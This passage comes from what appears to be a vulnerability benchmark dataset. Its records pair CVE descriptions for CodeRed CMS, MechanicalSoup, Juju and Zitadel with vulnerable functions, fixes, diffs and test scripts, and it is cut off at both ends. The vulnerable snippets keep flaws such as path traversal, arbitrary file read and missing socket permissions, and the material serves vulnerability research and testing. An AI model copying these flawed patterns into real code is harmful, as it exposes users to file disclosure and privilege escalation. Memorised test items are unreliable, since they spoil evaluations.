os.path.abspath(cr_settings['PROTECTED_MEDIA_ROOT'])\n fullpath = os.path.abspath(os.path.join(mediapath, path))\n\n # Path must be a sub-path of the PROTECTED_MEDIA_ROOT, and exist.\n if fullpath.startswith(mediapath) and os.path.isfile(fullpath):\n mimetype, encoding = mimetypes.guess_type(fullpath)\n with open(fullpath, 'rb') as f:\n response = HttpResponse(f.read(), content_type=mimetype)\n if encoding:\n response[\"Content-Encoding\"] = encoding\n\n return response\n raise Http404()"}], "vul_patch": "--- a/coderedcms/views.py\n+++ b/coderedcms/views.py\n@@ -2,8 +2,12 @@\n \"\"\"\n Function that serves protected files uploaded from forms.\n \"\"\"\n- fullpath = os.path.join(cr_settings['PROTECTED_MEDIA_ROOT'], path)\n- if os.path.isfile(fullpath):\n+ # Fully resolve all provided paths.\n+ mediapath = os.path.abspath(cr_settings['PROTECTED_MEDIA_ROOT'])\n+ fullpath = os.path.abspath(os.path.join(mediapath, path))\n+\n+ # Path must be a sub-path of the PROTECTED_MEDIA_ROOT, and exist.\n+ if fullpath.startswith(mediapath) and os.path.isfile(fullpath):\n mimetype, encoding = mimetypes.guess_type(fullpath)\n with open(fullpath, 'rb') as f:\n response = HttpResponse(f.read(), content_type=mimetype)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-34457", "cve_description": "MechanicalSoup is a Python library for automating interaction with websites. Starting in version 0.2.0 and prior to version 1.3.0, a malicious web server can read arbitrary files on the client using a `` inside HTML form. All users of MechanicalSoup's form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values. Version 1.3.0 contains a patch for this issue.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/MechanicalSoup/MechanicalSoup", "patch_url": ["https://github.com/MechanicalSoup/MechanicalSoup/commit/d57c4a269bba3b9a0c5bfa20292955b849006d9e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_66_1", "commit": "b9c8a0c", "file_path": "mechanicalsoup/browser.py", "start_line": 187, "end_line": 293, "snippet": " @classmethod\n def get_request_kwargs(cls, form, url=None, **kwargs):\n \"\"\"Extract input data from the form.\"\"\"\n method = str(form.get(\"method\", \"get\"))\n action = form.get(\"action\")\n url = urllib.parse.urljoin(url, action)\n if url is None: # This happens when both `action` and `url` are None.\n raise ValueError('no URL to submit to')\n\n # read https://www.w3.org/TR/html52/sec-forms.html\n if method.lower() == \"get\":\n data = kwargs.pop(\"params\", dict())\n else:\n data = kwargs.pop(\"data\", dict())\n files = kwargs.pop(\"files\", dict())\n\n # Use a list of 2-tuples to better reflect the behavior of browser QSL.\n # Requests also retains order when encoding form data in 2-tuple lists.\n data = [(k, v) for k, v in data.items()]\n\n multipart = form.get(\"enctype\", \"\") == \"multipart/form-data\"\n\n # Process form tags in the order that they appear on the page,\n # skipping those tags that do not have a name-attribute.\n selector = \",\".join(f\"{tag}[name]\" for tag in\n (\"input\", \"button\", \"textarea\", \"select\"))\n for tag in form.select(selector):\n name = tag.get(\"name\") # name-attribute of tag\n\n # Skip disabled elements, since they should not be submitted.\n if tag.has_attr('disabled'):\n continue\n\n if tag.name == \"input\":\n if tag.get(\"type\", \"\").lower() in (\"radio\", \"checkbox\"):\n if \"checked\" not in tag.attrs:\n continue\n value = tag.get(\"value\", \"on\")\n else:\n # browsers use empty string for inputs with missing values\n value = tag.get(\"value\", \"\")\n\n # If the enctype is not multipart, the filename is put in\n # the form as a text input and the file is not sent.\n if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n filepath = value\n if filepath != \"\" and isinstance(filepath, str):\n content = open(filepath, \"rb\")\n else:\n content = \"\"\n filename = os.path.basename(filepath)\n # If value is the empty string, we still pass it\n # for consistency with browsers (see\n # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n files[name] = (filename, content)\n else:\n data.append((name, value))\n\n elif tag.name == \"button\":\n if tag.get(\"type\", \"\").lower() in (\"button\", \"reset\"):\n continue\n else:\n data.append((name, tag.get(\"value\", \"\")))\n\n elif tag.name == \"textarea\":\n data.append((name, tag.text))\n\n elif tag.name == \"select\":\n # If the value attribute is not specified, the content will\n # be passed as a value instead.\n options = tag.select(\"option\")\n selected_values = [i.get(\"value\", i.text) for i in options\n if \"selected\" in i.attrs]\n if \"multiple\" in tag.attrs:\n for value in selected_values:\n data.append((name, value))\n elif selected_values:\n # A standard select element only allows one option to be\n # selected, but browsers pick last if somehow multiple.\n data.append((name, selected_values[-1]))\n elif options:\n # Selects the first option if none are selected\n first_value = options[0].get(\"value\", options[0].text)\n data.append((name, first_value))\n\n if method.lower() == \"get\":\n kwargs[\"params\"] = data\n else:\n kwargs[\"data\"] = data\n\n # The following part of the function is here to respect the\n # enctype specified by the form, i.e. force sending multipart\n # content. Since Requests doesn't have yet a feature to choose\n # enctype, we have to use tricks to make it behave as we want\n # This code will be updated if Requests implements it.\n if multipart and not files:\n # Requests will switch to \"multipart/form-data\" only if\n # files pass the `if files:` test, so in this case we use\n # a modified dict that passes the if test even if empty.\n class DictThatReturnsTrue(dict):\n def __bool__(self):\n return True\n __nonzero__ = __bool__\n\n files = DictThatReturnsTrue()\n\n return cls._get_request_kwargs(method, url, files=files, **kwargs)"}, {"id": "vul_py_66_2", "commit": "b9c8a0c", "file_path": "mechanicalsoup/form.py", "start_line": 242, "end_line": 281, "snippet": " def set(self, name, value, force=False):\n \"\"\"Set a form element identified by ``name`` to a specified ``value``.\n The type of element (input, textarea, select, ...) does not\n need to be given; it is inferred by the following methods:\n :func:`~Form.set_checkbox`,\n :func:`~Form.set_radio`,\n :func:`~Form.set_input`,\n :func:`~Form.set_textarea`,\n :func:`~Form.set_select`.\n If none of these methods find a matching element, then if ``force``\n is True, a new element (````) will be\n added using :func:`~Form.new_control`.\n\n Example: filling-in a login/password form with EULA checkbox\n\n .. code-block:: python\n\n form.set(\"login\", username)\n form.set(\"password\", password)\n form.set(\"eula-checkbox\", True)\n\n Example: uploading a file through a ```` field (provide the path to the local file,\n and its content will be uploaded):\n\n .. code-block:: python\n\n form.set(\"tagname\", path_to_local_file)\n\n \"\"\"\n for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n try:\n getattr(self, \"set_\" + func)({name: value})\n return\n except InvalidFormMethod:\n pass\n if force:\n self.new_control('text', name, value=value)\n return\n raise LinkNotFoundError(\"No valid element named \" + name)"}, {"id": "vul_py_66_3", "commit": "b9c8a0c", "file_path": "mechanicalsoup/form.py", "start_line": 283, "end_line": 304, "snippet": " def new_control(self, type, name, value, **kwargs):\n \"\"\"Add a new input element to the form.\n\n The arguments set the attributes of the new element.\n \"\"\"\n # Remove existing input-like elements with the same name\n for tag in ('input', 'textarea', 'select'):\n for old in self.form.find_all(tag, {'name': name}):\n old.decompose()\n # We don't have access to the original soup object (just the\n # Tag), so we instantiate a new BeautifulSoup() to call\n # new_tag(). We're only building the soup object, not parsing\n # anything, so the parser doesn't matter. Specify the one\n # included in Python to avoid having dependency issue.\n control = BeautifulSoup(\"\", \"html.parser\").new_tag('input')\n control['type'] = type\n control['name'] = name\n control['value'] = value\n for k, v in kwargs.items():\n control[k] = v\n self.form.append(control)\n return control"}], "fix_func": [{"id": "fix_py_66_1", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/browser.py", "start_line": 188, "end_line": 296, "snippet": " @classmethod\n def get_request_kwargs(cls, form, url=None, **kwargs):\n \"\"\"Extract input data from the form.\"\"\"\n method = str(form.get(\"method\", \"get\"))\n action = form.get(\"action\")\n url = urllib.parse.urljoin(url, action)\n if url is None: # This happens when both `action` and `url` are None.\n raise ValueError('no URL to submit to')\n\n # read https://www.w3.org/TR/html52/sec-forms.html\n if method.lower() == \"get\":\n data = kwargs.pop(\"params\", dict())\n else:\n data = kwargs.pop(\"data\", dict())\n files = kwargs.pop(\"files\", dict())\n\n # Use a list of 2-tuples to better reflect the behavior of browser QSL.\n # Requests also retains order when encoding form data in 2-tuple lists.\n data = [(k, v) for k, v in data.items()]\n\n multipart = form.get(\"enctype\", \"\") == \"multipart/form-data\"\n\n # Process form tags in the order that they appear on the page,\n # skipping those tags that do not have a name-attribute.\n selector = \",\".join(f\"{tag}[name]\" for tag in\n (\"input\", \"button\", \"textarea\", \"select\"))\n for tag in form.select(selector):\n name = tag.get(\"name\") # name-attribute of tag\n\n # Skip disabled elements, since they should not be submitted.\n if tag.has_attr('disabled'):\n continue\n\n if tag.name == \"input\":\n if tag.get(\"type\", \"\").lower() in (\"radio\", \"checkbox\"):\n if \"checked\" not in tag.attrs:\n continue\n value = tag.get(\"value\", \"on\")\n else:\n # browsers use empty string for inputs with missing values\n value = tag.get(\"value\", \"\")\n\n # If the enctype is not multipart, the filename is put in\n # the form as a text input and the file is not sent.\n if is_multipart_file_upload(form, tag):\n if isinstance(value, io.IOBase):\n content = value\n filename = os.path.basename(getattr(value, \"name\", \"\"))\n else:\n content = \"\"\n filename = os.path.basename(value)\n # If content is the empty string, we still pass it\n # for consistency with browsers (see\n # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n files[name] = (filename, content)\n else:\n if isinstance(value, io.IOBase):\n value = os.path.basename(getattr(value, \"name\", \"\"))\n data.append((name, value))\n\n elif tag.name == \"button\":\n if tag.get(\"type\", \"\").lower() in (\"button\", \"reset\"):\n continue\n else:\n data.append((name, tag.get(\"value\", \"\")))\n\n elif tag.name == \"textarea\":\n data.append((name, tag.text))\n\n elif tag.name == \"select\":\n # If the value attribute is not specified, the content will\n # be passed as a value instead.\n options = tag.select(\"option\")\n selected_values = [i.get(\"value\", i.text) for i in options\n if \"selected\" in i.attrs]\n if \"multiple\" in tag.attrs:\n for value in selected_values:\n data.append((name, value))\n elif selected_values:\n # A standard select element only allows one option to be\n # selected, but browsers pick last if somehow multiple.\n data.append((name, selected_values[-1]))\n elif options:\n # Selects the first option if none are selected\n first_value = options[0].get(\"value\", options[0].text)\n data.append((name, first_value))\n\n if method.lower() == \"get\":\n kwargs[\"params\"] = data\n else:\n kwargs[\"data\"] = data\n\n # The following part of the function is here to respect the\n # enctype specified by the form, i.e. force sending multipart\n # content. Since Requests doesn't have yet a feature to choose\n # enctype, we have to use tricks to make it behave as we want\n # This code will be updated if Requests implements it.\n if multipart and not files:\n # Requests will switch to \"multipart/form-data\" only if\n # files pass the `if files:` test, so in this case we use\n # a modified dict that passes the if test even if empty.\n class DictThatReturnsTrue(dict):\n def __bool__(self):\n return True\n __nonzero__ = __bool__\n\n files = DictThatReturnsTrue()\n\n return cls._get_request_kwargs(method, url, files=files, **kwargs)"}, {"id": "fix_py_66_2", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/form.py", "start_line": 244, "end_line": 283, "snippet": " def set(self, name, value, force=False):\n \"\"\"Set a form element identified by ``name`` to a specified ``value``.\n The type of element (input, textarea, select, ...) does not\n need to be given; it is inferred by the following methods:\n :func:`~Form.set_checkbox`,\n :func:`~Form.set_radio`,\n :func:`~Form.set_input`,\n :func:`~Form.set_textarea`,\n :func:`~Form.set_select`.\n If none of these methods find a matching element, then if ``force``\n is True, a new element (````) will be\n added using :func:`~Form.new_control`.\n\n Example: filling-in a login/password form with EULA checkbox\n\n .. code-block:: python\n\n form.set(\"login\", username)\n form.set(\"password\", password)\n form.set(\"eula-checkbox\", True)\n\n Example: uploading a file through a ```` field (provide an open file object,\n and its content will be uploaded):\n\n .. code-block:: python\n\n form.set(\"tagname\", open(path_to_local_file, \"rb\"))\n\n \"\"\"\n for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n try:\n getattr(self, \"set_\" + func)({name: value})\n return\n except InvalidFormMethod:\n pass\n if force:\n self.new_control('text', name, value=value)\n return\n raise LinkNotFoundError(\"No valid element named \" + name)"}, {"id": "fix_py_66_3", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/form.py", "start_line": 285, "end_line": 307, "snippet": " def new_control(self, type, name, value, **kwargs):\n \"\"\"Add a new input element to the form.\n\n The arguments set the attributes of the new element.\n \"\"\"\n # Remove existing input-like elements with the same name\n for tag in ('input', 'textarea', 'select'):\n for old in self.form.find_all(tag, {'name': name}):\n old.decompose()\n # We don't have access to the original soup object (just the\n # Tag), so we instantiate a new BeautifulSoup() to call\n # new_tag(). We're only building the soup object, not parsing\n # anything, so the parser doesn't matter. Specify the one\n # included in Python to avoid having dependency issue.\n control = BeautifulSoup(\"\", \"html.parser\").new_tag('input')\n control['type'] = type\n control['name'] = name\n control['value'] = value\n for k, v in kwargs.items():\n control[k] = v\n self._assert_valid_file_upload(control, value)\n self.form.append(control)\n return control"}, {"id": "fix_py_66_4", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/utils.py", "start_line": 19, "end_line": 23, "snippet": "def is_multipart_file_upload(form, tag):\n return (\n form.get(\"enctype\", \"\") == \"multipart/form-data\" and\n tag.get(\"type\", \"\").lower() == \"file\"\n )"}, {"id": "fix_py_66_5", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/form.py", "start_line": 390, "end_line": 402, "snippet": " def _assert_valid_file_upload(self, tag, value):\n \"\"\"Raise an exception if a multipart file input is not an open file.\"\"\"\n if (\n is_multipart_file_upload(self.form, tag) and\n not isinstance(value, io.IOBase)\n ):\n raise ValueError(\n \"From v1.3.0 onwards, you must pass an open file object \"\n 'directly, e.g. `form[\"name\"] = open(\"/path/to/file\", \"rb\")`. '\n \"This change is to remediate a security vulnerability where \"\n \"a malicious web server could read arbitrary files from the \"\n \"client (CVE-2023-34457).\"\n )"}], "vul_patch": "--- a/mechanicalsoup/browser.py\n+++ b/mechanicalsoup/browser.py\n@@ -42,18 +42,20 @@\n \n # If the enctype is not multipart, the filename is put in\n # the form as a text input and the file is not sent.\n- if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n- filepath = value\n- if filepath != \"\" and isinstance(filepath, str):\n- content = open(filepath, \"rb\")\n+ if is_multipart_file_upload(form, tag):\n+ if isinstance(value, io.IOBase):\n+ content = value\n+ filename = os.path.basename(getattr(value, \"name\", \"\"))\n else:\n content = \"\"\n- filename = os.path.basename(filepath)\n- # If value is the empty string, we still pass it\n+ filename = os.path.basename(value)\n+ # If content is the empty string, we still pass it\n # for consistency with browsers (see\n # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n files[name] = (filename, content)\n else:\n+ if isinstance(value, io.IOBase):\n+ value = os.path.basename(getattr(value, \"name\", \"\"))\n data.append((name, value))\n \n elif tag.name == \"button\":\n\n--- a/mechanicalsoup/form.py\n+++ b/mechanicalsoup/form.py\n@@ -20,12 +20,12 @@\n form.set(\"eula-checkbox\", True)\n \n Example: uploading a file through a ```` field (provide the path to the local file,\n+ name=\"tagname\">`` field (provide an open file object,\n and its content will be uploaded):\n \n .. code-block:: python\n \n- form.set(\"tagname\", path_to_local_file)\n+ form.set(\"tagname\", open(path_to_local_file, \"rb\"))\n \n \"\"\"\n for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n\n--- a/mechanicalsoup/form.py\n+++ b/mechanicalsoup/form.py\n@@ -18,5 +18,6 @@\n control['value'] = value\n for k, v in kwargs.items():\n control[k] = v\n+ self._assert_valid_file_upload(control, value)\n self.form.append(control)\n return control\n\n--- /dev/null\n+++ b/mechanicalsoup/form.py\n@@ -0,0 +1,5 @@\n+def is_multipart_file_upload(form, tag):\n+ return (\n+ form.get(\"enctype\", \"\") == \"multipart/form-data\" and\n+ tag.get(\"type\", \"\").lower() == \"file\"\n+ )\n\n--- /dev/null\n+++ b/mechanicalsoup/form.py\n@@ -0,0 +1,13 @@\n+ def _assert_valid_file_upload(self, tag, value):\n+ \"\"\"Raise an exception if a multipart file input is not an open file.\"\"\"\n+ if (\n+ is_multipart_file_upload(self.form, tag) and\n+ not isinstance(value, io.IOBase)\n+ ):\n+ raise ValueError(\n+ \"From v1.3.0 onwards, you must pass an open file object \"\n+ 'directly, e.g. `form[\"name\"] = open(\"/path/to/file\", \"rb\")`. '\n+ \"This change is to remediate a security vulnerability where \"\n+ \"a malicious web server could read arbitrary files from the \"\n+ \"client (CVE-2023-34457).\"\n+ )\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-34457:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/MechanicalSoup\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-34457/bin/python -m pytest tests/test_browser.py::test_enctype_and_file_submit tests/test_stateful_browser.py::test_upload_file_with_malicious_default tests/test_stateful_browser.py::test_upload_file tests/test_stateful_browser.py::test_upload_file_raise_on_string_input\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-34457:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/MechanicalSoup\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-34457/bin/python -m pytest tests/test_browser.py tests/test_stateful_browser.py -k \"not test_enctype_and_file_submit and not test_upload_file and not test_select_form_associated_elements and not test_launch_browser\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2017-9232", "cve_description": "Juju before 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3 uses a UNIX domain socket without setting appropriate permissions, allowing privilege escalation by users on the system to root.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/juju/juju", "patch_url": ["https://github.com/juju/juju/commit/145a1d3048843004590baaf0417547bac90662d9", "https://github.com/juju/juju/commit/d4dc689bfb632dd09a58c4e3776c2559714e17e4", "https://github.com/juju/juju/commit/78c832f1d1e0d7d45b35c4d0e3915744a065cfcf"], "programing_language": "Go", "vul_func": [{"id": "vul_go_162_1", "commit": "2601c35", "file_path": "juju/sockets/sockets_nix.go", "start_line": 21, "end_line": 28, "snippet": "func Listen(socketPath string) (net.Listener, error) {\n\t// In case the unix socket is present, delete it.\n\tif err := os.Remove(socketPath); err != nil {\n\t\tlogger.Tracef(\"ignoring error on removing %q: %v\", socketPath, err)\n\t}\n\tlistener, err := net.Listen(\"unix\", socketPath)\n\treturn listener, errors.Trace(err)\n}"}], "fix_func": [{"id": "fix_go_162_1", "commit": "145a1d3", "file_path": "juju/sockets/sockets_nix.go", "start_line": 23, "end_line": 56, "snippet": "func Listen(socketPath string) (net.Listener, error) {\n\t// In case the unix socket is present, delete it.\n\tif err := os.Remove(socketPath); err != nil {\n\t\tlogger.Tracef(\"ignoring error on removing %q: %v\", socketPath, err)\n\t}\n\t// We first create the socket in a temporary directory as a subdirectory of\n\t// the target dir so we know we can get the permissions correct and still\n\t// rename the socket into the correct place.\n\t// ioutil.TempDir creates the temporary directory as 0700 so it starts with\n\t// the right perms as well.\n\tsocketDir, socketName := filepath.Split(socketPath)\n\t// socketName here is just the prefix for the temporary dir name,\n\t// so it won't collide\n\ttempdir, err := ioutil.TempDir(socketDir, socketName)\n\tif err != nil {\n\t\treturn nil, errors.Trace(err)\n\t}\n\tdefer os.RemoveAll(tempdir)\n\ttempSocketPath := filepath.Join(tempdir, socketName)\n\tlistener, err := net.Listen(\"unix\", tempSocketPath)\n\tif err != nil {\n\t\tlogger.Errorf(\"failed to listen on unix:%s: %v\", socketPath, err)\n\t\treturn nil, errors.Trace(err)\n\t}\n\tif err := os.Chmod(tempSocketPath, 0700); err != nil {\n\t\tlistener.Close()\n\t\treturn nil, errors.Trace(err)\n\t}\n\tif err := os.Rename(tempSocketPath, socketPath); err != nil {\n\t\tlistener.Close()\n\t\treturn nil, errors.Trace(err)\n\t}\n\treturn listener, nil\n}"}], "vul_patch": "--- a/juju/sockets/sockets_nix.go\n+++ b/juju/sockets/sockets_nix.go\n@@ -3,6 +3,32 @@\n \tif err := os.Remove(socketPath); err != nil {\n \t\tlogger.Tracef(\"ignoring error on removing %q: %v\", socketPath, err)\n \t}\n-\tlistener, err := net.Listen(\"unix\", socketPath)\n-\treturn listener, errors.Trace(err)\n+\t// We first create the socket in a temporary directory as a subdirectory of\n+\t// the target dir so we know we can get the permissions correct and still\n+\t// rename the socket into the correct place.\n+\t// ioutil.TempDir creates the temporary directory as 0700 so it starts with\n+\t// the right perms as well.\n+\tsocketDir, socketName := filepath.Split(socketPath)\n+\t// socketName here is just the prefix for the temporary dir name,\n+\t// so it won't collide\n+\ttempdir, err := ioutil.TempDir(socketDir, socketName)\n+\tif err != nil {\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\tdefer os.RemoveAll(tempdir)\n+\ttempSocketPath := filepath.Join(tempdir, socketName)\n+\tlistener, err := net.Listen(\"unix\", tempSocketPath)\n+\tif err != nil {\n+\t\tlogger.Errorf(\"failed to listen on unix:%s: %v\", socketPath, err)\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\tif err := os.Chmod(tempSocketPath, 0700); err != nil {\n+\t\tlistener.Close()\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\tif err := os.Rename(tempSocketPath, socketPath); err != nil {\n+\t\tlistener.Close()\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\treturn listener, nil\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-31124", "cve_description": "Zitadel is open-source identity infrastructure software. ZITADEL administrators can enable a setting called \"Ignoring unknown usernames\" which helps mitigate attacks that try to guess/enumerate usernames. If enabled, ZITADEL will show the password prompt even if the user doesn't exist and report \"Username or Password invalid\". While the setting was correctly respected during the login flow, the user's username was normalized leading to a disclosure of the user's existence. This vulnerability is fixed in 2.71.6, 2.70.8, 2.69.9, 2.68.9, 2.67.13, 2.66.16, 2.65.7, 2.64.6, and 2.63.9.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/zitadel/zitadel", "patch_url": ["https://github.com/zitadel/zitadel/commit/14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_289_1", "commit": "2eb187f1410a25e80ff86255923d534041c8d139", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 768, "end_line": 832, "snippet": "func (repo *AuthRequestRepo) checkLoginName(ctx context.Context, request *domain.AuthRequest, loginNameInput string) (err error) {\n\tvar user *user_view_model.UserView\n\tloginNameInput = strings.TrimSpace(loginNameInput)\n\tpreferredLoginName := loginNameInput\n\tif request.RequestedOrgID != \"\" {\n\t\tif request.RequestedOrgDomain {\n\t\t\tdomainPolicy, err := repo.getDomainPolicy(ctx, request.RequestedOrgID)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif domainPolicy.UserLoginMustBeDomain {\n\t\t\t\tpreferredLoginName += \"@\" + request.RequestedPrimaryDomain\n\t\t\t}\n\t\t}\n\t\tuser, err = repo.checkLoginNameInputForResourceOwner(ctx, request, loginNameInput, preferredLoginName)\n\t} else {\n\t\tuser, err = repo.checkLoginNameInput(ctx, request, loginNameInput, preferredLoginName)\n\t}\n\t// return any error apart from not found ones directly\n\tif err != nil && !zerrors.IsNotFound(err) {\n\t\treturn err\n\t}\n\t// if there's an active (human) user, let's use it\n\tif user != nil && !user.HumanView.IsZero() && domain.UserState(user.State).IsEnabled() {\n\t\trequest.SetUserInfo(user.ID, loginNameInput, user.PreferredLoginName, \"\", \"\", user.ResourceOwner)\n\t\treturn nil\n\t}\n\t// the user was either not found or not active\n\t// so check if the loginname suffix matches a verified org domain\n\t// but only if no org was requested (by id or domain)\n\tif request.RequestedOrgID == \"\" {\n\t\tok, errDomainDiscovery := repo.checkDomainDiscovery(ctx, request, loginNameInput)\n\t\tif errDomainDiscovery != nil || ok {\n\t\t\treturn errDomainDiscovery\n\t\t}\n\t}\n\t// let's once again check if the user was just inactive\n\tif user != nil && user.State == int32(domain.UserStateInactive) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-2n8fs\", \"Errors.User.Inactive\")\n\t}\n\t// or locked\n\tif user != nil && user.State == int32(domain.UserStateLocked) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-SF3gb\", \"Errors.User.Locked\")\n\t}\n\t// let's just check if unknown usernames are ignored\n\tif request.LoginPolicy != nil && request.LoginPolicy.IgnoreUnknownUsernames {\n\t\tif request.LabelPolicy != nil && request.LabelPolicy.HideLoginNameSuffix {\n\t\t\tpreferredLoginName = loginNameInput\n\t\t}\n\t\trequest.SetUserInfo(unknownUserID, preferredLoginName, preferredLoginName, preferredLoginName, \"\", request.RequestedOrgID)\n\t\treturn nil\n\t}\n\t// there was no policy that allowed unknown loginnames in any case\n\t// so not found errors can now be returned\n\tif err != nil {\n\t\treturn err\n\t}\n\t// let's check if it was a machine user\n\tif !user.MachineView.IsZero() {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-DGV4g\", \"Errors.User.NotHuman\")\n\t}\n\t// everything should be handled by now\n\tlogging.WithFields(\"authRequest\", request.ID, \"loginName\", loginNameInput).Error(\"unhandled state for checkLoginName\")\n\treturn zerrors.ThrowInternal(nil, \"AUTH-asf3df\", \"Errors.Internal\")\n}"}, {"id": "vul_go_289_2", "commit": "2eb187f1410a25e80ff86255923d534041c8d139", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 1037, "end_line": 1161, "snippet": "func (repo *AuthRequestRepo) nextSteps(ctx context.Context, request *domain.AuthRequest, checkLoggedIn bool) (steps []domain.NextStep, err error) {\n\tctx, span := tracing.NewSpan(ctx)\n\tdefer func() { span.EndWithError(err) }()\n\n\tif request == nil {\n\t\treturn nil, zerrors.ThrowInvalidArgument(nil, \"EVENT-ds27a\", \"Errors.Internal\")\n\t}\n\tsteps = make([]domain.NextStep, 0)\n\tif !checkLoggedIn && domain.IsPrompt(request.Prompt, domain.PromptNone) {\n\t\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n\t}\n\tif request.UserID == \"\" {\n\t\tsteps, err = repo.nextStepsUser(ctx, request)\n\t\tif err != nil || len(steps) > 0 {\n\t\t\treturn steps, err\n\t\t}\n\t}\n\tuser, err := activeUserByID(ctx, repo.UserViewProvider, repo.UserEventProvider, repo.OrgViewProvider, repo.LockoutPolicyViewProvider, request.UserID, request.LoginPolicy.IgnoreUnknownUsernames)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif user.PreferredLoginName != \"\" {\n\t\trequest.LoginName = user.PreferredLoginName\n\t}\n\tuserSession, err := userSessionByIDs(ctx, repo.UserSessionViewProvider, repo.UserEventProvider, request.AgentID, user)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\trequest.SessionID = userSession.ID\n\trequest.DisplayName = userSession.DisplayName\n\trequest.AvatarKey = userSession.AvatarKey\n\tif user.HumanView != nil && user.HumanView.PreferredLanguage != \"\" {\n\t\trequest.PreferredLanguage = gu.Ptr(language.Make(user.HumanView.PreferredLanguage))\n\t}\n\n\tisInternalLogin := (request.SelectedIDPConfigID == \"\" && userSession.SelectedIDPConfigID == \"\") || request.RequestLocalAuth\n\tidps, err := checkExternalIDPsOfUser(ctx, repo.IDPUserLinksProvider, user.ID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tnoLocalAuth := request.LoginPolicy != nil && !request.LoginPolicy.AllowUsernamePassword\n\n\tallowedLinkedIDPs := checkForAllowedIDPs(request.AllowedExternalIDPs, idps.Links)\n\tif (!isInternalLogin || len(allowedLinkedIDPs) > 0 || noLocalAuth) &&\n\t\tlen(request.LinkingUsers) == 0 &&\n\t\t!request.RequestLocalAuth {\n\t\tstep, err := repo.idpChecked(request, allowedLinkedIDPs, userSession)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\tif isInternalLogin || (!isInternalLogin && len(request.LinkingUsers) > 0) {\n\t\tstep := repo.firstFactorChecked(ctx, request, user, userSession)\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\n\t// If the user never had a verified email, we need to verify it.\n\t// This prevents situations, where OTP email is the only MFA method and no verified email is set.\n\t// If the user had a verified email, but change it and has not yet verified the new one, we'll verify it after we checked the MFA methods.\n\tif user.VerifiedEmail == \"\" && !user.IsEmailVerified {\n\t\treturn append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t}), nil\n\t}\n\n\tstep, ok, err := repo.mfaChecked(userSession, request, user, isInternalLogin && len(request.LinkingUsers) == 0)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif !ok {\n\t\treturn append(steps, step), nil\n\t}\n\n\texpired := passwordAgeChangeRequired(request.PasswordAgePolicy, user.PasswordChanged)\n\tif expired || user.PasswordChangeRequired {\n\t\tsteps = append(steps, &domain.ChangePasswordStep{Expired: expired})\n\t}\n\tif !user.IsEmailVerified {\n\t\tsteps = append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t})\n\t}\n\tif user.UsernameChangeRequired {\n\t\tsteps = append(steps, &domain.ChangeUsernameStep{})\n\t}\n\n\tif expired || user.PasswordChangeRequired || !user.IsEmailVerified || user.UsernameChangeRequired {\n\t\treturn steps, nil\n\t}\n\n\tif request.LinkingUsers != nil && len(request.LinkingUsers) != 0 {\n\t\treturn append(steps, 